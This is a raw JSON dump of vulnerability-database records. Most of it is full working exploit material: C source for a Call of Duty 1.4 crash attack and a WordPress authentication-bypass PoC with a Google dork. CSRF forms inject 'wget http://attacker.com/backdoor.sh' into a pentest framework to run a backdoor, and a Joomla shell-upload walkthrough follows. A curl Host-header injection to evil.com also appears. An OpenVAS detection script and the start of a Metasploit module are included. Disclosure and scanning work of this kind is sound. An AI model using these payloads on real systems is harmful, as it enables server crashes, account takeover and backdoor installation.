\"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n/* codboom.c */\r\n\r\n/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include <io.h>\r\n #include <malloc.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 2048\r\n#define PORT 28960\r\n#define TIMEOUT 3\r\n#define INFO \"\\xff\\xff\\xff\\xff\" \"getinfo xxx\\n\"\r\n#define BOOM \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\" \\\r\n \"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\"\r\n // must be major than 1023 bytes\r\n#define SVBOF \"\\xff\\xff\\xff\\xff\" \"getinfo %s\\n\"\r\n#define CLBOF \"\\xff\\xff\\xff\\xff\" \\\r\n \"%sResponse\\n\" \\\r\n \"\\\\g_gametype\\\\dm\" \\\r\n \"\\\\gamename\\\\Call of Duty\" \\\r\n \"\\\\mapname\\\\mp_carentan\" \\\r\n \"\\\\protocol\\\\5\" \\\r\n \"\\\\scr_friendlyfire\\\\0\" \\\r\n \"\\\\scr_killcam\\\\0\" \\\r\n \"\\\\shortversion\\\\1.4\" \\\r\n \"\\\\sv_allowAnonymous\\\\0\" \\\r\n \"\\\\sv_floodProtect\\\\1\" \\\r\n \"\\\\sv_hostname\\\\Crash\" \\\r\n \"\\\\sv_maxclients\\\\26\" \\\r\n \"\\\\sv_maxPing\\\\0\" \\\r\n \"\\\\sv_maxRate\\\\10000\" \\\r\n \"\\\\sv_minPing\\\\0\" \\\r\n \"\\\\sv_privateClients\\\\0\" \\\r\n \"\\\\sv_punkbuster\\\\1\" \\\r\n \"\\\\sv_pure\\\\1\" \\\r\n \"\\\\pswrd\\\\0\" \\\r\n \"\\\\mod\\\\1\" \\\r\n \"\\\\crash\\\\%s\"\r\n\r\n\r\n\r\nvoid show_info(u_char *buff);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n int sd,\r\n len,\r\n psz,\r\n on = 1,\r\n type;\r\n u_short port = PORT;\r\n u_char buff[BUFFSZ + 1];\r\n struct sockaddr_in peer;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Call of Duty <= 1.4 server/client shutdown \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 2) {\r\n printf(\"\\nUsage: %s <attack> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Attack:\\n\"\r\n \" c = broadcast clients shutdown\\n\"\r\n \" s = server shutdown\\n\"\r\n \" You must add the IP or the hostname of the server after the 's'.\\n\"\r\n \"\\n\"\r\n \"Some usage examples:\\n\"\r\n \" codboom c listens on port %d for clients\\n\"\r\n \" codboom c 1234 listens on port 1234\\n\"\r\n \" codboom s 192.168.0.1 tests the server 192.168.0.1 on port %d\\n\"\r\n \" codboom s codserver 1234 tests the server codserver on port 1234\\n\"\r\n \"\\n\", argv[0], PORT, PORT, PORT);\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif \r\n\r\n type = argv[1][0];\r\n if(type == 's') {\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Error: you must specify the server IP or hostname.\\n\"\r\n \" Example: %s s localhost\\n\"\r\n \"\\n\", argv[0]);\r\n exit(1);\r\n }\r\n peer.sin_addr.s_addr = resolv(argv[2]);\r\n if(argc > 3) port = atoi(argv[3]);\r\n printf(\"\\n- Target %s:%hu\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n port);\r\n\r\n } else if(type == 'c') {\r\n peer.sin_addr.s_addr = INADDR_ANY;\r\n if(argc > 2) port = atoi(argv[2]);\r\n printf(\"\\n- Listen on port %d\\n\", port);\r\n\r\n } else {\r\n fputs(\"\\n\"\r\n \"Error: Wrong type of chosen attack.\\n\"\r\n \" You can choose between 2 types of attacks, passive versus clients with\\n\"\r\n \" 'c' or versus servers with 's'\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n psz = sizeof(peer);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n if(type == 's') {\r\n fputs(\"- Request informations\\n\", stdout);\r\n if(sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\n\"\r\n \"Error: socket timeout, probably the server is not online or the port is wrong\\n\"\r\n \"\\n\", stdout);\r\n exit(1);\r\n }\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n show_info(buff);\r\n\r\n fputs(\"- Send BOOM packet\\n\", stdout);\r\n len = sprintf(buff, SVBOF, BOOM);\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n printf(\"\\n\"\r\n \"Server doesn't seem to be vulnerable, the following is the answer received:\\n\"\r\n \"\\n%s\\n\\n\", buff);\r\n }\r\n } else {\r\n if(setsockopt(sd, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))\r\n < 0) std_err();\r\n if(bind(sd, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n fputs(\" Clients:\\n\", stdout);\r\n for(;;) {\r\n len = recvfrom(sd, buff, BUFFSZ, 0, (struct sockaddr *)&peer, &psz);\r\n if(len < 0) std_err();\r\n buff[len] = 0x00;\r\n\r\n printf(\"%16s:%hu -> %s\\n\",\r\n inet_ntoa(peer.sin_addr),\r\n ntohs(peer.sin_port),\r\n buff);\r\n\r\n if(!memcmp(buff + 4, \"getinfo\", 7)) {\r\n len = sprintf(buff, CLBOF, \"info\", BOOM);\r\n } else {\r\n len = sprintf(buff, CLBOF, \"status\", BOOM);\r\n }\r\n if(sendto(sd, buff, len, 0, (struct sockaddr *)&peer, sizeof(peer))\r\n < 0) std_err();\r\n }\r\n }\r\n\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\n\r\nvoid show_info(u_char *buff) {\r\n int nt = 1;\r\n u_char *string;\r\n\r\n while((string = strchr(buff, '\\\\'))) {\r\n *string = 0x00;\r\n if(!nt) {\r\n printf(\"%30s: \", buff);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", buff);\r\n nt = 0;\r\n }\r\n buff = string + 1;\r\n }\r\n printf(\"%s\\n\", buff);\r\n}\r\n\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)(hp->h_addr);\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n# 0day.today [2018-04-04] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "939ad61322c6011a78b807d828c2caef", "key": "description"}, {"hash": "e2900be7b904b6cb4baea1c38c00cf86", "key": "href"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "modified"}, {"hash": "619318fadde833ee77a53ae1fee56d32", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5a856d8508314549fc011ddb2462253e", "key": "reporter"}, {"hash": "686b25390267b5dd8a71adcda093ff2b", "key": "sourceData"}, {"hash": "c5b84d6d56faead77cf51aaefa7e01a8", "key": "sourceHref"}, {"hash": "888babac088d40ba4e1d76e7b342e511", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-02-18T21:28:04", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-11-06T00:00:00", "published": "2017-11-06T00:00:00", "href": "https://0day.today/exploit/description/28960", "id": "1337DAY-ID-28960", "type": "zdt", "title": "WordPress Userpro Plugin < 4.9.17.1 - Authentication Bypass Vulnerability", "sourceData": "# Exploit Title: Userpro \u2013 WordPress Plugin \u2013 Authentication Bypass\r\n# Google Dork: inurl:/plugins/userpro\r\n# Date: 11.04.2017\r\n# Exploit Author: Colette Chamberland (Wordfence), Iain Hadgraft (Duke University)\r\n# Vendor Homepage: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9\r\n# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681?s_rank=9\r\n# Version: <= 4.6.17\r\n# Tested on: Wordpress 4.8.3\r\n# CVE : requested, not assigned yet.\r\n \r\nDescription\r\n================================================================================\r\n The userpro plugin has the ability to bypass login authentication for the user\r\n 'admin'. If the site does not use the standard username 'admin' it is not affected.\r\n \r\nPoC\r\n================================================================================\r\n1 - Google Dork inurl:/plugins/userpro\r\n \r\n2 - Browse to a site that has the userpro plugin installed.\r\n \r\n3 - Append ?up_auto_log=true to the target: http://www.targetsite.com/?up_auto_log=true\r\n \r\n4 - If the site has a default 'admin' user you will now see the wp menu at the top of the site. You are now logged in\r\nwill full administrator access.\r\n================================================================================\r\n \r\n10/25/2017 \u2013 Wordfence notified of issue by Iain Hadgraft.\r\n10/26/2017 \u2013 Vendor resolved the issue in the plugin.\r\n11/04/2017 - Disclosure.\n\n# 0day.today [2018-02-18] #", "sourceHref": "https://0day.today/exploit/28960", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-11T05:17:36", "bulletinFamily": "exploit", "description": "Smartphone Pentest Framework (SPF) versions 0.1.3 and 0.1.4 suffer from an OS command injection vulnerability.", "modified": "2012-12-12T00:00:00", "published": "2012-12-12T00:00:00", "id": "1337DAY-ID-19942", "href": "https://0day.today/exploit/description/19942", "type": "zdt", "title": "Smartphone Pentest Framework 0.1.3 / 0.1.4 Command Injection", "sourceData": "Product: Smartphone Pentest Framework (SPF)\r\nVendor: Bulb Security LLC\r\nVulnerable Versions: 0.1.3, 0.1.4 and probably prior\r\nTested Versions: 0.1.3, 0.1.4\r\nVendor Notification: November 19, 2012 \r\nPublic Disclosure: December 10, 2012 \r\nVulnerability Type: OS Command Injection [CWE-78]\r\nCVE Reference: CVE-2012-5878\r\nCVSSv2 Base Score: 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C)\r\nRisk Level: High \r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple command execution vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine remotely. \r\n\r\nSimilar vulnerabilities were discovered (https://www.htbridge.com/advisory/HTB23123 , CVE-2012-5693) in the previous version (0.1.2) of SPF and were patched by vendor. \r\n\r\nHowever, multiple CSRF vulnerabilities (HTB23123, CVE-2012-5695) were not patched by the vendor. Therefore even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for the majority of pentesters) the vulnerabilities can still be easily exploited via a local/internal network, or even from the Internet via CSRF vector. In default installation of Smartphone Pentest Framework its web server port and application path of its GUI are easily predictable: localhost:80/frameworkgui/\r\n\r\nPlease refer to HTB23123 advisory (https://www.htbridge.com/advisory/HTB23122) for detailed attack scenarios examples.\r\n\r\n\r\n1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5878\r\n\r\nMultiple Perl scripts in the \"/frameworkgui/\" directory do not perform sanitation of user-supplied input passed as argument to the \"system()\" function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server user. \r\n\r\n1.1 The vulnerability exists in \"SEAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector. \r\n\r\nThe PoC code below will download a backdoor located on 'attacker.com' and run it on pentester's machine with privileges of the web server. Despite relatively low privileges attacker can always try to download all files accessible to him and/or escalate privileges to get remote root access to the system. \r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/SEAttack.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"platformDD2\" value='android' />\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.ch && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.2 The vulnerability exists in \"CSAttack.pl\" script due to insufficient validation of user-supplied input passed via the \"hostingPath\" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/CSAttack.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"hostingPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.3 The vulnerability exists in \"attachMobileModem.pl\" script due to insufficient validation of user-supplied input passed via the \"appURLPath\" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/attachMobileModem.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"appURLPath\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n\r\n1.4 The vulnerability exists in \"guessPassword.pl\" script due to insufficient validation of user-supplied input passed via the \"ipAddressTB\" parameter. The vulnerability can be exploited remotely via CSRF vector:\r\n\r\n\r\n<form action=\"http://localhost/cgi-bin/frameworkgui/guessPassword.pl\" method=\"post\" name=f1>\r\n<input type=\"hidden\" name=\"ipAddressTB\" value='a & wget http://attacker.com/backdoor.sh && chmod a+x ./backdoor.sh && ./backdoor.sh & ' />\r\n<input type=\"submit\" id=\"btn\">\r\n</form>\r\n<script>\r\ndocument.f1.Submit()\r\n</script>\r\n\r\n\r\n-----------------------------------------------------------------------------------------------\r\n\r\nSolution:\r\n\r\nOn December 5, 2012 vendor replied that vulnerabilities are patched. However, on the Disclosure date version 0.1.4 was still found to be vulnerable.\r\n\r\nAs a temporary solution remove or disable SPF's GUI.\r\n\r\n-----------------------------------------------------------------------------------------------\n\n# 0day.today [2018-01-11] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/19942"}, {"lastseen": "2018-04-14T08:05:10", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-06-18T00:00:00", "published": "2010-06-18T00:00:00", "id": "1337DAY-ID-12773", "href": "https://0day.today/exploit/description/12773", "type": "zdt", "title": "Joomla Component com_joomlisting Upload Vulnerability", "sourceData": "=====================================================\r\nJoomla Component com_joomlisting Upload Vulnerability\r\n=====================================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ########################################## 1\r\n0 I'm Sid3^effects member from Inj3ct0r Team 1\r\n1 ########################################## 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\nName : Joomla com_joomlisting Upload Vulnerability\r\nDate : june, 18 2010\r\nVendor url :http://www.joomclan.com/demo/joomlistings/index.php\r\nCritical Level : MEDIUM\r\nAuthor : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>\r\nspecial thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,gunslinger_\r\ngreetz to :All ICW members and my friends luv y0 guyz\r\n#######################################################################################################\r\nDescription:\r\nStart your very own Classified Ads website today or add classifieds functionality to your existing website using JoomListings. This component\r\n\r\nintegrates with your Joomla portal and has all the tools you need to create a successful, and income-earning website. We provide you with an\r\n\r\nintuitive admin control panel from Joomla Administrator to add, modify settings and pricing packages on your site. The component can be set\r\n\r\nup to run itself through automatic email notifications, automated billing, and other valuable time-saving features.\r\n\r\nJC - JoomListings is a professionally developed classifieds component that was built with you - the site owner - in mind and to assist you in\r\n\r\ngenerating income from your website. Whether you are running classifieds for autos, motorcycles, bicycles, real estate, jobs, or general\r\n\r\nmerchandise, JoomListings component with Joomla! is the right package for you.\r\n\r\n#######################################################################################################\r\ncom_joomdocs suffers from Upload Vulnerability\r\n\r\nXploit:Upload Vulnerability\r\n\r\nStep 1 : As always register as a user :P\r\n\r\nStep 2 : Select \"post ad\" option.\r\n DEMO URL :http://www.joomclan.com/demo/joomlistings/index.php?option=com_joomlistings&view=ad&layout=post&Itemid=61\r\n\r\nStep 3 : Upload your shell in upload image option as well as your description area\r\n\r\nStep 4 : Now browse your and you can own the box\r\n\r\n###############################################################################################################\r\n# 0day no more\r\n# Sid3^effects \r\n\r\n\n\n# 0day.today [2018-04-14] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/12773"}], "wpvulndb": [{"lastseen": "2019-07-15T13:40:29", "bulletinFamily": "software", "description": "WordPress Vulnerability - WordPress 2.3-4.8.3 - Host Header Injection in Password Reset curl -H \"Host: www.evil.com\" --data \"user_login=admin&redirect;_to=&wp-submit;=Get+New+Password\" http://example.com/wp-login.php?action=lostpassword \n", "modified": "2018-08-29T00:00:00", "published": "2017-05-05T00:00:00", "id": "WPVDB-ID:8807", "href": "https://wpvulndb.com/vulnerabilities/8807", "type": "wpvulndb", "title": "WordPress 2.3-4.8.3 - Host Header Injection in Password Reset", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2019-07-17T14:26:51", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2015-10-29T00:00:00", "id": "OPENVAS:1361412562310806154", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806154", "title": "Apple Mac OS X Multiple Vulnerabilities-02 October-15", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Mac OS X Multiple Vulnerabilities-02 October-15\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806154\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2015-7761\", \"CVE-2015-7760\", \"CVE-2015-5922\", \"CVE-2015-5917\",\n \"CVE-2015-5915\", \"CVE-2015-5914\", \"CVE-2015-5913\", \"CVE-2015-5902\",\n \"CVE-2015-5901\", \"CVE-2015-5900\", \"CVE-2015-5897\", \"CVE-2015-5894\",\n \"CVE-2015-5893\", \"CVE-2015-5891\", \"CVE-2015-5890\", \"CVE-2015-5889\",\n \"CVE-2015-5888\", \"CVE-2015-5887\", \"CVE-2015-5884\", \"CVE-2015-5883\",\n \"CVE-2015-5878\", \"CVE-2015-5877\", \"CVE-2015-5875\", \"CVE-2015-5873\",\n \"CVE-2015-5872\", \"CVE-2015-5871\", \"CVE-2015-5870\", \"CVE-2015-5866\",\n \"CVE-2015-5865\", \"CVE-2015-5864\", \"CVE-2015-5854\", \"CVE-2015-5853\",\n \"CVE-2015-5849\", \"CVE-2015-5836\", \"CVE-2015-5833\", \"CVE-2015-5830\",\n \"CVE-2015-3785\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-10-29 13:24:34 +0530 (Thu, 29 Oct 2015)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-02 October-15\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists. For details refer\n reference section.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain sensitive information, execute arbitrary code, bypass intended launch\n restrictions and access restrictions, cause a denial of service, write to\n arbitrary files, execute arbitrary code with system privilege.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.6.8 through\n 10.11\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X version\n 10.11 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT205267\");\n script_xref(name:\"URL\", value:\"http://lists.apple.com/archives/security-announce/2015/Sep/msg00008.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.([6-9|10)\\.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer)\n exit(0);\n\nif(\"Mac OS X\" >< osName)\n{\n if(version_in_range(version:osVer, test_version:\"10.6.8\", test_version2:\"10.10.5\"))\n {\n report = report_fixed_ver(installed_version:osVer, fixed_version:\"10.11\");\n security_message(data:report);\n exit(0);\n }\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-29T21:06:32", "bulletinFamily": "exploit", "description": "This module exploits a lack of authentication and access control in HP Intelligent Management, specifically in the AccountService RpcServiceServlet from the SOM component, in order to create a SOM account with Account Management permissions. This module has been tested successfully on HP Intelligent Management Center 5.2 E0401 and 5.1 E202 with SOM 5.2 E0401 and SOM 5.1 E0201 over Windows 2003 SP2.\n", "modified": "2017-10-09T22:06:05", "published": "2013-10-23T21:01:01", "id": "MSF:AUXILIARY/ADMIN/HP/HP_IMC_SOM_CREATE_ACCOUNT", "href": "", "type": "metasploit", "title": "HP Intelligent Management SOM Account Creation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP Intelligent Management SOM Account Creation',\n 'Description' => 